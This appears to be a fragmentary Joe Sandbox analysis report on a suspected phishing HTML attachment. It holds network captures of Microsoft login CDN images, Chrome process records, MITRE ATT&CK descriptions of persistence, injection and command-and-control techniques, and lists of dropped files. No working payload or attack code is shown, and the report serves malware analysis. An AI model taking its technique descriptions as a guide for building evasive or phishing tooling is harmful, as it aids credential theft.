2024-05-29 13:06:23 UTC	638	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:23 UTC	785	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:23 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: dc100c79-301e-0029-2203-af07be000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240529T130623Z-16f669959b47c72x1qvh32v4xc0000000e5g000000000z3d x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-05-29 13:06:23 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:23 UTC	617	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:23 UTC	784	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:23 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:46 GMT ETag: 0x8DB5C3F47E260FD x-ms-request-id: 874df0d5-201e-001c-4781-aaa1a5000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240529T130623Z-16f669959b45vtfs3prk2h6wsc0000000atg00000000uy0q x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-05-29 13:06:23 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:23 UTC	509	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:24 UTC	510	IN	HTTP/1.1 200 OK Age: 9004 Cache-Control: public,max-age=14400,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; Content-Type: text/css Date: Wed, 29 May 2024 13:06:24 GMT Etag: "0649d1db2b1da1:0+gzip+ident" Last-Modified: Wed, 29 May 2024 10:22:32 GMT Server: ECS (lhd/35B3) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-05-29 13:06:24 UTC	16383	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-05-29 13:06:24 UTC	7044	IN	Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:25 UTC	416	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-29 13:06:25 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:06:25 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 6728eaf8-101e-003b-3ec9-b1e198000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240529T130625Z-16f669959b4s56fqrets0n4r9g0000000dpg00000000gu24 x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-05-29 13:06:25 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:26 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-29 13:06:27 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=10993 Date: Wed, 29 May 2024 13:06:27 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:28 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-29 13:06:28 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=11001 Date: Wed, 29 May 2024 13:06:28 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-29 13:06:28 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:37 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=usUrKCa4GBP5D7k&MD=2Hnvowrb HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-29 13:06:37 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 799589f2-e173-4a73-b3f7-4f7a4ca9db67 MS-RequestId: b99c662a-df5c-49f2-81f6-3c74a35fbaee MS-CV: uvU+ZSwQA0+m0n6F.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 29 May 2024 13:06:36 GMT Connection: close Content-Length: 24490
2024-05-29 13:06:37 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-29 13:06:37 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:07:14 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=usUrKCa4GBP5D7k&MD=2Hnvowrb HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-29 13:07:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440" MS-CorrelationId: 37b30690-322a-4ca2-9bd6-ecd8cc535612 MS-RequestId: 26d077bf-5bff-4ac7-bc4d-fbb3690d7a9f MS-CV: 1ofJFKuydUaYqClC.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 29 May 2024 13:07:14 GMT Connection: close Content-Length: 25457
2024-05-29 13:07:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-29 13:07:15 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	2
Start time:	09:06:16
Start date:	29/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html"
Imagebase:	0x7ff6b2cb0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	09:06:19
Start date:	29/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1924,i,8006472540143360931,17686916618025515442,262144 /prefetch:8
Imagebase:	0x7ff6b2cb0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Chrome Cache Entry: 98

Chrome Cache Entry: 99

Static File Info

Windows Analysis Report
ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
